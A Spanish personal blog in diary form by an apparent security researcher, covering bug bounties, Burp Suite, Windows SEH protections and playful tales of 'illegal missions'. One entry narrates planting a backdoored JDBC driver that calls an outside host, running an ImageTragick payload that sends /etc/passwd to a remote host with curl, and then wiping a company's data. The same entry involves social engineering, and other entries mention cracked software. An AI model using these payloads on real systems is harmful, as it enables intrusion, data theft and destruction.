Domingo, 14 de Abril de 2019: Restricciones

Querido Diario…

El viernes por la noche todo era felicidad… había sido una semana en donde había ganado 2000% mi capital inicial, pero cometí un error y perdí casi todo. Después de eso, el fin de semana, no me pude recuperar, a trabajos evite perder el resto

- Hum... ¿por qué apostaste todo?
- Si no arriesgas no ganas
- Hum... algún día serás muy rico... o algún día serás muy pobre
- Es sólo cosa de las restricciones
- ¿Restricciones?
- Si, y me enoja... ve, tienes un partido de futbol, yo apuesto en eso porque es como lo más sencillo. Los partidos de futbol duran 90 minutos, entonces, yo espero cuando van por el minuto 70 y apuesto a lo más probable. No son ganancias grandes, pero si apuesto $100, ganó $20, en algunas ocasiones puedo ganar hasta $50; al día más o menos puedo ganar de forma acumulada unos $1000, pero, el problema son las restricciones de la aplicaciones, a veces anotan dos goles en el minuto 45 y cierran la apuesta, entonces ya no puedes apostar; eso es injusto, y a veces, anotan en el minuto 89 y eso hace que toda la probabilidad se mueva; teóricamente todavía puedes apostar en ese momento a un empate, y sería una muy buena apuesta; pero obvio la cierran para que el casino no pierda
- Pues si, es la ventaja del casino, siempre ganan; seguro hacen eso a propósito
- Pues si, pero si no, entonces ganar sería cosa de cálculo
- Si no hubiese restricciones, entonces todos serían ricos... deja eso, busca otra forma más normal de ganar dinero.
- Si no hubiese restricciones, yo podría ser rico

Si, ¿qué necesito para que no haya restricciones?, ¿acaso podría poner mis apuestas de forma más rápida que esperando a que la aplicación genere el boleto de apuestas?, acaso ¿podría incluso manejar apuestas sin fondos…

Tal vez… pueda haber una forma de no tener restricciones…

Querido Diario… conseguir el APK de una aplicación no es nada complicado, yo sólo uso la extensión de Chrome: APK Downloader; una vez instalado, sólo se le pasa el URL de la aplicación a descargar y es todo.

Miércoles, 6 de Febrero de 2019: Dos es mejor que uno

Querido Diario…

A pesar de que tengo una máquina virtual en donde dice que tengo instalado Windows de 64 bits; al sólo tener un microprocesador Genymotion lo detectó como de 32 bits, evitando ejecutar un Android cargado en un Samsung S9. Y hasta que no agregué un segundo procesador a la máquina virtual fue que ejecutó la máquina virtual de Genymotion… oh si, virtualización sobre virtualización 😛 RAM a toda prueba, y luego hay quienes dicen que las Macbook no son pro 😛 … I Apple.

Pero bueno… después de que ya está todo corriendo, coff.. coff.. ¿cómo se le hace para usar un Android? jajaja 😛 no es que sea payaso, pero… no tengo ni idea de que botón apretar 😛

También tengo otro problema (oh si, ya había olvidado que en el researching todo el tiempo uno se la pasa en problemas), el “dispositivo” no carga. Venía con media carga de fábrica, y el domingo le usé y quedó como a mitad de carga, pero ahora que lo conecto, no veo que cargue, ya lo hice a la electricidad y a la computadora por un puerto USB y nada.. hum… vaya a ser que como es patrocinador está defectuoso D:

Pff…

Querido Diario… hay un unicornio en la cocina.

Martes, 29 de Enero de 2019: Regeración

Querido Diario…

¿Qué nos ha enseñado Doctor Who?

¡Exacto!, que todo se arregla con una regeneración… así que para resolver el problema con Burp Suite, regeneré el certificado, y lo volví a agregar al navegador entrando a http://burp, y seleccionando permisos para todo a esa CA.

¿Por qué?, no tengo idea, pero funcionó, y hoy ya pude trabajar bien.

Querido Diario… este vídeo sólo hizo que me diese mucha hambre:

 

Jueves, 8 de Noviembre de 2018: Seguiré mis sueños e ilusiones

Querido Diario…

H0y fuimos a comer para despedirnos, si los países se encuentran en posición, las estrellas se alinean y los sacrificios son escuchados; tal vez hoy fue su último día en Mexicali… en México.

- ¿Y ahora qué será de ti?, te va a parar la policía, vas a chocar, te van a mal influenciar... - dijo de forma bastante seria
- Si... de hecho, necesito una conciencia; tal vez tome una nueva. Hum... hum... hum... bueno ya pensaré en alguna. ¿Sabes?, he estado pensando
- ¿En qué? - dijo mientras le tomaba una foto a la comida y la enviaba a sus inquisidores por mensaje
- Creo que debo de hacerte caso... es el momento de cambiar, de aprovechar lo que el poderoso Quetzalcoatl me ofrece, es el momento de seguir mis sueños. - justo en ese momento recordé a Lalo y Lalo2

- ¿Ah si?, ¿qué vas a ser?, ¿dejarás la vida turbia e ilegal o regresarás a tener un empleo normal? - me miró aun escribiendo por el celular, sin imaginar lo que venía por respuesta.
- Si... me jubilo, adios la vida turbia e ilegal; voy a ir la próxima semana a despedir. Es el fin, se acabó... no más... es tiempo de tener una vida normal - se le abrieron los ojos, dejó de escribir... por suerte, no tenía té en la boca o lo hubiese escupido.

- No te creo - se rió - no, no... me intentas, ¿cómo dices?, ¿chamaquear?
- No, lo digo en serio... es tiempo de mirar al futuro, de hacer cambios, cambios importantes. 
- ¿Qué harás?, ¿por qué ahora?... noooo.. quiero enterarme - empezó a creerlo
- Es una sorpresa, lo tengo que anunciar en grande, frente a todos; además... aunque se que me van a matar, tengo que mostrar mi agradecimiento a toda la H. Organización Turbia e Ilegal... los llevaré - me puse melancólico - siempre en mi corazón
- Pero, ¿qué harás?, ¿de qué vivirás?
- Ouuu... ya verás, tengo tantas opciones... más o menos me ofrecen un empleo por día.. creo que... tengo de donde elegir.

- Decenas... no... tal vez cientos de personas, entraran en shock con el anuncio que haré; y ya sé en donde lo hará... en el próximo NoTrustSex.. digo Sec: https://www.meetup.com/es/NoTrustSec/events/256251030/ ... hum... lástima, estarás al otro lado del mundo para enterarte
- Grrrr...

Querido Diario… va a ser un notición… ¿qué será lo que tengo que decir?, bueno… hay que esperar una semana para saberlo… les espero en el NoTrustSec de la Ciudad de México, en donde contaré algo, que volverá loca a la gente 😛

Querido Diario…

Chan, chan, charán…

Martes, 16 de Octubre de 2018: Un criminal solitario

Querido Diario…

Iba tranquilamente manejando sobre Av. Justo Sierra, yendo hacia Baires para comer, cuando de pronto me llegó un mensaje.

Llevaba tiempo que no teníamos una misión, así que inmediatamente me coordine con el equipo para avanzar, lo más pronto posible. Marqué a la persona de mayor confianza.

- Bueno
- ¡Joven!
- ¿Qué cuenta joven?
- Pues nada, aquí con un encarguito
- ¿Qué clase de encarguito? - le cambió el tono de voz, a uno más serio
- Mom me pidió ir a dar unos tehuacanazos
- ¡Huuuuy joven!, creo que eso no se va a poder... pero dame una semana y lo vemos - y me colgó

Hum.. diablos, el elemento más turbio y confiable de esta H. Organización Turbia e Ilegal no estaba disponible; pero al menos espero me traiga un recuerdito. Entonces, le marqué a la segunda opción.

- Bueno - se escuchaba una voz grave y cansada, como de alguien que lleva varios días sin dormir
- ¡Joven!
- ¿Qué pasó?
- ¿Qué haces? - dije yo, intentando ocultar el verdadero motivo de mi llamada
- Viendo el partido
- ¿Cual partido?
- Pues el partido
- Hum.. pero ¿partido de que o qué?
- Hum... ¿de futbol? - algo me decía que no me estaba diciendo la verdad
- ¿En lunes?
- ¿No hay partido los lunes?
- Creo que no
- Ouuuu... - lo había atrapado
- Estas cuidando de la bebé, ¿cierto?
- Si joven, llevó una semana sin dormir y mis tarjetas están en negativo - dijo casi llorando
- Hum... joven, algo me dice que esto no va a funcionar. Básicamente ya no puedo mandarte a ninguna misión turbia e ilegal, me sentiría mal si esa niña se queda huérfana
- ¿Hay una misión turbia e ilegal?, ¿hay bono extra?
- Joven - me pusé serio
- ¿Si?
- Nos vemos en 18 años, joven
- Demonios... mi carrera criminal ha durado poco - y le colgué

Bueno, siempre hay una tercera opción

- Bueno
- ¿Qué tranza? - me respondió con ese barrio iztapalapense que brinda confianza en este tipo de escenarios
- ¡Janey!, ¿qué estas haciendo?
- Noviando con El Chino
- Ouu... 
- ¿Necesitabas algo?
- Pozolear a un criminal
- ¿No podemos esperar para mañana? - me dijo, plenamente interesada
- No
- Ouuu.. marcarle a Lalito
- No puede
- ¿Al Becario?
- Tampoco
- Hum... seguro tú podrás resolverlo, siempre puedes. Nos vemos Belindo - y me colgó

Hum… este equipo no está resultando. Así que miré a Shellcode, me miro, nos miramos.. y determiné que yo mismo haría la misión turbia e ilegal, al final, por eso soy el lugarteniente de esta H. Organización Turbia e Ilegal, yo podía hacerlo sólo. Y me puse a trabajar en ello.

Ouu… bueno, tal vez mi única compañera no me acompañaría en la misión.

Me senté frente a la computadora, la miré fijamente… y me di cuenta que no tenía la menor idea de que hacer; así que me di cuenta que en realidad ya estoy muy viejo, y sin equipo no soy nada. Lo único que se me ocurrió es utilizar las únicas técnicas que conozco: chamaquear a alguien.

Por suerte me di cuenta de alguien que trabajaba en ese sitio y que me iba a ser de utilidad.

- ¿Y qué haces allí?
- Ahhh pues... no mucho, me encargo como de todo - eso pasa cuando se es la sobrina del dueño - ¿y tú que haces?
- Nada, aquí aburrido... vamos a comer
- Ok, pero me esperas a que terminé unas cosas
- Si, claro... salgo para allá y de allí nos vamos

Llegué a su oficina y rápidamente empecé a explorar la red. No es una empresa muy grande, así que me encontré ShareEnum que tenían directorios compartidos para varías cosas, incluyendo un “repositorio” de librerías de los programadores. Vi que hacían uso de aplicaciones en Java y las conectaban a los servidores de bases de datos haciendo uso de JDBC, así que, basándome en un paper de un researcher llamado Airman, modifiqué los el driver así:

import java.sql.*;

public class JDBCBackdoorTest {
public static void main(String[] argsStrings){
try{
Connection conn = DriverManager.getConnection("jdbc:blah://bigshot.beer:31337/");
} catch(Exception e) {
e.printStackTrace();
}
}
}

Listo, lo dejé allí y me fui a comer con Priscilla.

Más tarde al llegar a casa me di cuenta que al menos tres desarrolladores habían utilizado el driver para conectarse. Me puse los audífonos y puse la play list especial de hackeo: https://open.spotify.com/playlist/0EfZGNw0JHvoCkNfnMDYAU

¿Qué es lo que hace el driver?, bueno… simplemente ejecuta comandos en la consola, con eso obtuve acceso remoto a la red de la súper empresa segura. Mom no quería más que destruir todo, así que…

Sólo antes de borrar todo y colapsar a todos, quería probar el CVE-2016-3714:

push graphic-context 
viewbox 0 0 640 480 
fill 'url(localhost"|curl "`curl MyHost/i/?imagewarn --data @/etc/passwd`)' 
pop graphic-context

Y…

Ya después de que deje de jugar, entonces si, borré todo…

Querido Diario…

Regresé a casa y me puse a trabajar en el primer assessment que me asignaron, a pesar de que mi profile está pensado para aplicaciones, me dieron un network security assessment 😛 no saqué nada… así que, necesitaba un poco de despejar la mente para poder seguir trabajando.

- ¿Cómo te fue? - me preguntó mientras me pasaba una tarta de pistache y ella se quedaba con la de chocolate; de las que venden en Raphael; frente al Carl's Jr
- Bien, cansado... pero creo que bien; se ven esperanzas
- ¿Qué es eso de [...]? - me preguntó, yo le había comentado en al semana que estaba muy emocionado por eso
- Es un programa privado de bug bounty.... lo de las recompensas
- Te notas muy feliz por eso
- Si - dije pensando - me gusta mucho, me hace sentir que aun sirvo para algo
- ¿No extrañas trabajar en eso?
- Si, moriría de ganas de poder hacerlo nuevamente
- ¿Y luego? - mi miró con esa mirada que tiene de "hazlo"
- Hum... mejor retirarse en la cima - evadí la pregunta
- ¿Qué sientes? - me preguntó. Perfectamente sabía a que se refería
- Duele
- ¿Qué tanto?
- Mucho... duele el pecho, duele todo... es como algo que presiona; duele no poder dar un beso, duelen los brazos al no poder abrazarle... duele no poder siquiera escuchar su risa o su voz
- Hum... 
- Hey, basta.. cuéntame... ¿cómo te fue hoy?

- Hum... mejor no, ¿tienes prisa?, ¿vamos al cine?. Vamos a ver Venom, aunque no te gusten las películas de súper héroes
- Vale,... ¡vamos!, pero pediremos nachos; con muchos jalapeños y Pepsi, porque la Coca-cola, yiuck...

Nunca entenderé porque a la gente le gustan las películas de súper héroes; me parecen muy aburridas y predecibles.

- ¿Cual es tu película favorita? - me preguntó mientras íbamos de regreso al coche
- Moulin Rouge - dije
- ¿Por qué?
- Hum... no lo sé; me gusta la historia. Un tiempo le vi tanto que hasta los diálogos me aprendí

- Eres raro - dijo de pronto
- Hum... no sé como tomar eso - le respondí arremendandole
- Nos vemos terrorista cibernético; intenta dormir
- Trataré...

Me quedé fuera de la casa, en un columpió, viendo como Shellcode se peleaba con la manguera del agua… y pensando en lo que tanto me repitieron la semana pasada. Pensé y pensé… y al final recordé que… lo mejor es no planear, sino sólo actuar. Y entonces, lo decidí… lo voy a hacer.

 

Miércoles, 5 de Septiembre de 2018: Lo lindo de lo simple

Querido Diario…

Haya por los años del quién sabe cuando que no recuerdo, Microsoft, hizo una modificación interesante a la forma en que se venía llamado a los Exceptions Handlers; en Windows XP SP1.

Los Exception Handlers son una cadena de “objetos” (en realidad no son objetos, pero llevo todo el día intentado recordar como se llaman exactamente… creo que estructuras, pero no recuerdo, me quedé dormido en esa clase xD), en donde se tienen dos elementos, uno es un puntero al siguiente Exception Handler, y otro es el puntero hacia la acción que va a ejecutar ese Exception Handler. Lo que inicialmente hacían los hackers para explotar algún fallo que encontraban, era modificar el salto del EIP disparando un Exception Handler, y a su vez el Exception Handler, te mandaba hacia una dirección modificada. Para hacer eso, se tenía que ingresar directamente a la dirección de memoria del Exception Handler.

Lo que hizo Microsoft para evitar fue esto, es extremadamente sencillo. Cada que ntdll.dll dispará el SEH Chain (el inicio de la cadena de Exception Handlers) se “XORean” todas las direcciones, de esa forma antes de usarse tienen un 0x00000000, es decir.. se borra todo y se inutilizan. Y listo, así de sencillo no es posible alocar una shellcode allí. Después en Windows 2003 server implementaron el mismo cambio.

Microsoft… siempre a la vanguardia en seguridad, muy por encima de todos los S.O.’s…. (escuche un par de linuxeros rabiar y llorar por allí coff.. coff… esa cosa que aun tiene BOF’s es 2018 😛 )

Lo interesante de esto… es que es muy limpio y muy sencillo, y totalmente válido hasta la fecha para evitar la alocación directa de algún payload en una dirección de memoria. Lo que evita un clásico pop ret, ret, ret o un pop %eax o un mov directo, etc..

Querido Diario…

Siempre me ha encantado los cíclidos por su temperamento. Adoraba los Oscares, y siempre quise un FH…

Viernes, 31 de Octubre de 2018: Larry Lau

Querido Diario…

Hoy lanzaron un missions op en Synack para un assessment, pero no alcancé ninguna misión. Así que me quedé sin bounties. Por suerte si gané el que encontré estaba semana de Graphql.

Iré a la reunión mensual de Mexicali Open Source… aunque empieza hasta las 7pm y apenas son las 3pm… los días en el desierto siempre se pasan muy lento…

Intenté instalar un Burp Suite crackeado, porque venció la licencia que me regalaron de HackerOne y no funcionó.

Querido Diario… he sido seleccionado, o más bien autorizado; viajaré la siguiente semana a una misión turbia e ilegal a Canadá… la fecha la escogí a propósito. Iré con mi amigo Dario… Dario tiene fama de ir acompañado y siempre volver sólo; yo tengo fama de siempre volver.

Hoy recordé el día en que, hace ya mucho. platicábamos sobre los tatuajes; porque siempre tenía un dibujo que se había hecho en algún sitio. Y jamás le pude explicar el significado del Código QR que tengo, que significa un “puedo imprimirle al mundo entero que te amo”. Y lo recordé por este vídeo:

… que mala persona fui; pero no se puede mentir todo el tiempo… sobre todo no se puede mentir a uno mismo todo el tiempo. Es lo más difícil.

¿Cuál de las dos famas hará efecto una sobre la otra?, ¿la del artillero o la del de seguridad informática?.

Martes, 28 de Agosto de 2018: Chou me, baby!

Querido Diario…

Ya que no pude sacar el bounty por “Authorization bypass” hoy he estado trabajando en otra cosa que parece que tuvo mayor fruto. Y de nuevo es como volver a las viejas tecnologías. En este caso JSON. Cuando recién salió Angular JS todo era horrible, ya no se podía soltar solo Acunetix a lo loco y sacar un montón de juicy bugs, ahora todo cambiaba. De hecho la primer vez que me encontré con JSON fue revisando unas aplicaciones muy raras cuando vivía en un pueblo llamado Aguascalientes.

Pues bien, GraphQL no usa exactamente JSON, pero si envía un chorro (un shoooorro) de información que podría resultado medio sensible. Así que sólo hay que configurar el filtro de Burp Suite para poder cachar cosas como usuarios, sesiones, API keys, etc.

Y coff… coff…

Ouuuu si, te recomiendo que revises la documentación de la API que estes consumiendo (en este caso si es un API), porque así puedes saber el tipo de filtros que debes de configurar en Burp Suite.

Espero ahora si pegue, porque ya necesito algo de dinero, después de que me cobraron el deducible del seguro del Mustang mi tarjeta se ve muy, muy, MUY fea.

Querido Diario, quiero cambiarle de alimento a Shellcode, creo que le falta algo de peso y altura, la veo muy chaparrita. ¿Dónde puedo conseguir en Mexicali este alimento?

 

… creo que todo mundo cree que soy una mala persona.